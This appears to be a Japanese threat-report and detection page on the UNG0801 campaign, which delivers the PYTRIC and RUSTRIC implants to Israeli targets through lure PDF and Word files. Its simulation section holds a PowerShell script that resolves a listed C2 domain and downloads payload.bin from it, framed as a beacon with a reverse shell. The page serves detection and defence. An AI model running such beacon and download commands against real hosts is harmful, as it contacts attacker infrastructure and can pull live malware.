フォローする
概要
このレポートは、イスラエルの組織を標的とし、アンチウイルスのアイコンを偽装するペイロードを配信するために悪意のあるPDFおよびWord文書を武器とする2つの関連キャンペーンを概説しています。一方のトラックではPYTRICというPyInstallerでパッケージ化されたPythonインプラントを落とし込み、もう一方ではマクロを有効にしたWord文書を通じてRustベースのインプラントRUSTRICを配信します。どちらのペイロードもホストの詳細を収集し、システムコマンドを実行し、インストールされたセキュリティソフトウェアを調査します。PYTRICには追加で破壊的機能も含まれています。配信はスピアフィッシング添付ファイルとクラウドにホストされたリンク(Dropboxを含む)によって駆動され、コマンドと制御にはTelegramが使用されています。
調査
SEQRITE Labsは初期のフィッシングルアーを分析し、埋め込まれたマクロを抽出し、ドロップされたペイロードチェーンを再構築しました。PYTRICはファイル探索と消去ルーチンを備えたPyInstallerバンドルであることが確認され、アナリストたちはBackup2040に関連付けられたTelegramボットの資格情報を観察しました。RUSTRICは28のアンチウイルス製品をチェックし、WMIを使用して16進数エンコードされたペイロードをトリガーするRustバイナリとしてプロファイルされました。インフラストラクチャの分析により、配信がDropboxリンク及び netvigil.org.
緩和策
ユーザーに対して未承諾のPDFやWord添付ファイルを特にセキュリティツールやAV関連のユーティリティとして提示されるファイルを慎重に扱うように訓練します。メールセキュリティを設定してマクロを含むドキュメントをブロックし、クラウドストレージホストに指すURLを警告または制限します。エンドポイントでは、PyInstallerの実行、異常なWMIプロセスの作成、whoami、hostname、nslookupなどの組み込みユーティリティの不審な呼び出しを監視します。特定された悪質なドメインやIPのブロックは、感染パスをさらに妨害することができます。
対応策
活動が検出された場合、影響を受けたシステムを隔離し、揮発性データを保存し、ハッシュベースのトリアージのために悪意のある文書を収集します。不審なWMIが生成したプロセスを停止し、一般的な配布場所(ダウンロードフォルダなど)からドロップされたペイロードを削除します。ファイル削除や消去活動のフォレンジック検証を行い、潜在的に露出した資格情報をリセットし、フォローオンのTelegram C2通信を監視します。
“graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef file fill:#c2f0c2 classDef malware fill:#ff9999 classDef process fill:#dddddd classDef operator fill:#ff9900 %% Action nodes attack_phishing[“<b>アクション</b> – <b>T1566.001 フィッシング: スピアフィッシング添付ファイル</b><br/>被害者は悪意のあるPDFまたはWordの添付ファイルを含むメールを受け取ります。”] class attack_phishing action attack_user_exec[“<b>アクション</b> – <b>T1204.002 ユーザーによる実行: 悪意のあるファイル</b><br/>被害者が悪意のあるPDFまたはWord文書を開き、実行がトリガーされます。”] class attack_user_exec action attack_ingress_transfer[“<b>アクション</b> – <b>T1105 侵入ツール転送</b><br/>PDFは被害者にDropboxから第二段階のペイロードをダウンロードするよう指示します。”] class attack_ingress_transfer action attack_exec_python[“<b>アクション</b> – <b>T1059.006 コマンドおよびスクリプトインタープリター: Python</b><br/>PYTRIC (PyInstallerでパッケージされたPython実行ファイル) がホスト上で実行されます。”] class attack_exec_python action attack_exec_vb[“<b>アクション</b> – <b>T1059.005 コマンドおよびスクリプトインタープリター: Visual Basic</b><br/>Word文書内のVBAマクロがデコードし、最終的なペイロードを書き込みます。”] class attack_exec_vb action attack_masquerade[“<b>アクション</b> – <b>T1036.005 偽装: 正当な名前または場所に合わせる</b><br/>バイナリは信頼できるアンチウイルスベンダー (Check Point, SentinelOne) に似せた名前が付けられています。”] class attack_masquerade action attack_obfuscate[“<b>アクション</b> – <b>T1027 ファイルまたは情報の難読化</b><br/>ペイロードは静的検出を避けるためにマクロ内に16進符号化されています。”] class attack_obfuscate action attack_proxy_exec[“<b>アクション</b> – <b>T1218 システムバイナリプロキシ実行</b><br/>正当なバイナリ (wmic, whoami.exe, hostname.exe, nslookup.exe) がコマンドを実行するために使用されます。”] class attack_proxy_exec action attack_wmi[“<b>アクション</b> – <b>T1047 Windows Management Instrumentation</b><br/>RUSTRICはWMI (Win32_Process.Create) を通じて起動されます。”] class attack_wmi action attack_sw_discovery[“<b>アクション</b> – <b>T1518.001 セキュリティソフトウェアの発見</b><br/>RUSTRICは既知のパスとプロセスを調べて28のアンチウイルス/EDR製品を列挙します。”] class attack_sw_discovery action attack_process_discovery[“<b>アクション</b> – <b>T1057 プロセスの発見</b><br/>RUSTRICはエンドポイントで実行中のプロセスをリストアップします。”] class attack_process_discovery action attack_c2_web[“<b>アクション</b> – <b>T1071.001 アプリケーション層プロトコル: ウェブプロトコル</b><br/>インプラントは標準のウェブプロトコルでC2と通信します。”] class attack_c2_web action attack_c2_port[“<b>アクション</b> – <b>T1571 標準外のポート</b><br/>ポート443でHTTPSを用いて通信が行われます。”] class attack_c2_port action attack_subvert_trust[“<b>アクション</b> – <b>T1553 信頼の制御を覆す</b><br/>バイナリは正当なセキュリティベンダーのアイコン/ブランディングで偽装されています。”] class attack_subvert_trust action attack_impair_defenses[“<b>アクション</b> – <b>T1562.011 防御の弱体化: セキュリティ警告の偽装</b><br/>偽のセキュリティ警告が悪意のあるバイナリの信頼感を強化します。”] class attack_impair_defenses action %% Tool nodes tool_wmic[“<b>ツール</b> – <b>名前</b>: wmic<br/><b>説明</b>: Windows Management Instrumentation コマンドラインユーティリティ。”] class tool_wmic tool tool_whoami[“<b>ツール</b> – <b>名前</b>: whoami.exe<br/><b>説明</b>: 現在のユーザー名を出力します。”] class tool_whoami tool tool_hostname[“<b>ツール</b> – <b>名前</b>: hostname.exe<br/><b>説明</b>: マシンのホスト名を返します。”] class tool_hostname tool tool_nslookup[“<b>ツール</b> – <b>名前</b>: nslookup.exe<br/><b>説明</b>: DNSクエリユーティリティ。”] class tool_nslookup tool %% File nodes file_malicious_pdf[“<b>ファイル</b> – <b>名前</b>: 悪意のあるPDF<br/><b>目的</b>: 初期指示の配信手段。”] class file_malicious_pdf file file_malicious_word[“<b>ファイル</b> – <b>名前</b>: 悪意のあるWord<br/><b>目的</b>: 最終ペイロードをデコードするVBAマクロを含む。”] class file_malicious_word file file_dropbox[“<b>ファイル</b> – <b>名前</b>: Dropboxペイロードリンク<br/><b>目的</b>: 第二段階のPYTRIC実行ファイルをホストする。”] class file_dropbox file %% Malware nodes malware_pytric[“<b>マルウェア</b> – <b>名前</b>: PYTRIC<br/><b>説明</b>: PyInstallerでパッケージされたPythonバックドア。”] class malware_pytric malware malware_rustric[“<b>マルウェア</b> – <b>名前</b>: RUSTRIC<br/><b>説明</b>: 発見とC2に使用されるWMI実行コンポーネント。”] class malware_rustric malware %% Operator node for branching op_and1((“AND”)) class op_and1 operator %% Connections attack_phishing u002du002d>|配信| file_malicious_pdf attack_phishing u002du002d>|配信| file_malicious_word file_malicious_pdf u002du002d>|被害者に開かれる| attack_user_exec file_malicious_word u002du002d>|被害者に開かれる| attack_user_exec attack_user_exec u002du002d>|トリガー| attack_ingress_transfer attack_ingress_transfer u002du002d>|ダウンロード| file_dropbox file_dropbox u002du002d>|提供| malware_pytric attack_user_exec u002du002d>|実行| attack_exec_vb attack_exec_vb u002du002d>|書き込み| malware_rustric attack_ingress_transfer u002du002d>|実行| attack_exec_python attack_exec_python u002du002d>|実行| malware_pytric malware_pytric u002du002d>|使用| attack_obfuscate malware_pytric u002du002d>|使用| attack_masquerade attack_obfuscate u002du002d>|サポート| attack_proxy_exec attack_masquerade u002du002d>|サポート| attack_proxy_exec attack_proxy_exec u002du002d>|呼び出し| tool_wmic attack_proxy_exec u002du002d>|呼び出し| tool_whoami attack_proxy_exec u002du002d>|呼び出し| tool_hostname attack_proxy_exec u002du002d>|呼び出し| tool_nslookup tool_wmic u002du002d>|起動| attack_wmi attack_wmi u002du002d>|実行| malware_rustric malware_rustric u002du002d>|実行| attack_sw_discovery malware_rustric u002du002d>|実行| attack_process_discovery attack_sw_discovery u002du002d>|フィード| attack_c2_web attack_process_discovery u002du002d>|フィード| attack_c2_web attack_c2_web u002du002d>|使用| attack_c2_port attack_c2_web u002du002d>|有効化| attack_subvert_trust attack_c2_web u002du002d>|有効化| attack_impair_defenses %% Styling class attack_phishing,attack_user_exec,attack_ingress_transfer,attack_exec_python,attack_exec_vb,attack_masquerade,attack_obfuscate,attack_proxy_exec,attack_wmi,attack_sw_discovery,attack_process_discovery,attack_c2_web,attack_c2_port,attack_subvert_trust,attack_impair_defenses action class tool_wmic,tool_whoami,tool_hostname,tool_nslookup tool class file_malicious_pdf,file_malicious_word,file_dropbox file class malware_pytric,malware_rustric malware class op_and1 operator “
攻撃フロー
検出
可能なTelegramの悪用としてのコマンド&コントロールチャンネル(dns_query経由)
表示
可能なデータ流入/流出/第三者サービス/ツールを通じたC2(dns経由)
表示
可能なシステム列挙(cmdline経由)
表示
検出するためのIoC(SourceIP):イスラエルを標的としたAVアイコン偽装に執着する脅威クラスターUNG0801の追跡
表示
検出するためのIoC(DestinationIP):イスラエルを標的としたAVアイコン偽装に執着する脅威クラスターUNG0801の追跡
表示
検出するためのIoC(HashSha256):イスラエルを標的としたAVアイコン偽装に執着する脅威クラスターUNG0801の追跡
表示
特定のドメインとIPを使用したC2通信[Windowsネットワーク接続]
表示
Operation IconCatにおける悪意のあるPDFおよびインプラントの実行検出[Windowsプロセス作成]
表示
シミュレーション実行
前提条件:テレメトリー&ベースラインのプリフライトチェックが通過している必要があります。
根拠:このセクションは、検出ルールをトリガーするために設計された攻撃者の技術(TTP)の正確な実行を詳述しています。コマンドとナラティブは識別されたTTPsを直接反映し、検出ロジックによって期待される正確なテレメトリーを生成することを目的とする必要があります。抽象的または無関連な例は誤診につながります。
-
攻撃シナリオ&コマンド:
攻撃者は事前にドメインを登録し stratioai.org を 159.198.68.25 (侵害されたVPS)に解決されるように設定しました。PowerShellの1行で、C2ビーコンを起動し、小さなペイロードをダウンロードして、その後永続的なリバースシェルを維持します。アウトバウンド接続はHTTPS(ポート443)で行われ、通常のトラフィックと混合しますが、ファイアウォールは宛先IPとDNSクエリを記録し、シグマルールを満たします。 -
回帰テストスクリプト:
# ------------------------------------------------- # 検出検証用のシミュレートされたC2ビーコン # ------------------------------------------------- # 1. 悪意のあるドメインを解決(DNSクエリを強制する) $maliciousDomain = "stratioai.org" $resolved = [System.Net.Dns]::GetHostAddresses($maliciousDomain) Write-Host "Resolved $maliciousDomain to $($resolved -join ', ')" # 2. 悪意のあるIP(C2)へのHTTPS接続を確立する $maliciousIP = "159.198.68.25" $url = "https://$maliciousDomain/payload.bin" try { $response = Invoke-WebRequest -Uri $url -UseBasicParsing -TimeoutSec 10 Write-Host "C2 request succeeded, size: $($response.ContentLength) bytes" } catch { Write-Error "C2 request failed: $_" } # 3. オプション:30秒間チャネルを保持する Start-Sleep -Seconds 30 # ------------------------------------------------- -
クリーンアップコマンド:
# 一時ファイルを削除する(このスクリプトで作成されるものはありません) # 偶発的な再利用を避けるためにDNSキャッシュをクリアする ipconfig /flushdns Write-Host "クリーンアップ完了。"